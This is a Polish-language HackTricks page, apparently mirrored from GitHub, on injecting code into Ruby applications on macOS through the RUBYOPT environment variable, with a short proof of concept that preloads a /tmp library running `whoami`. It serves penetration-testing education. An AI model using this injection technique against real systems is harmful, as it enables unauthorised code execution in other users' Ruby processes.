mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 05:33:33 +00:00
57 lines
3.2 KiB
Markdown
57 lines
3.2 KiB
Markdown
# Wstrzykiwanie kodu w aplikacje Ruby na macOS
|
|
|
|
<details>
|
|
|
|
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Inne sposoby wsparcia HackTricks:
|
|
|
|
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)!
|
|
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
|
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
|
|
## RUBYOPT
|
|
|
|
Korzystając z tej zmiennej środowiskowej, można **dodawać nowe parametry** do **ruby'ego** za każdym razem, gdy jest uruchamiany. Chociaż parametr **`-e`** nie może być używany do określenia kodu ruby do wykonania, można użyć parametrów **`-I`** i **`-r`** do dodania nowego folderu do ścieżki ładowania bibliotek, a następnie **określenia biblioteki do załadowania**.
|
|
|
|
Utwórz bibliotekę **`inject.rb`** w folderze **`/tmp`**:
|
|
|
|
{% code title="inject.rb" %}
|
|
```ruby
|
|
puts `whoami`
|
|
```
|
|
{% endcode %}
|
|
|
|
Stwórz skrypt Ruby gdziekolwiek, na przykład:
|
|
|
|
{% code title="hello.rb" %}
|
|
```ruby
|
|
puts 'Hello, World!'
|
|
```
|
|
{% endcode %}
|
|
|
|
Następnie wykonaj dowolny skrypt Ruby, załaduj go za pomocą:
|
|
```bash
|
|
RUBYOPT="-I/tmp -rinject" ruby hello.rb
|
|
```
|
|
Ciekawostka, działa nawet z parametrem **`--disable-rubyopt`**:
|
|
```bash
|
|
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Inne sposoby wsparcia HackTricks:
|
|
|
|
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
|
|
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
|
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.
|
|
|
|
</details>
|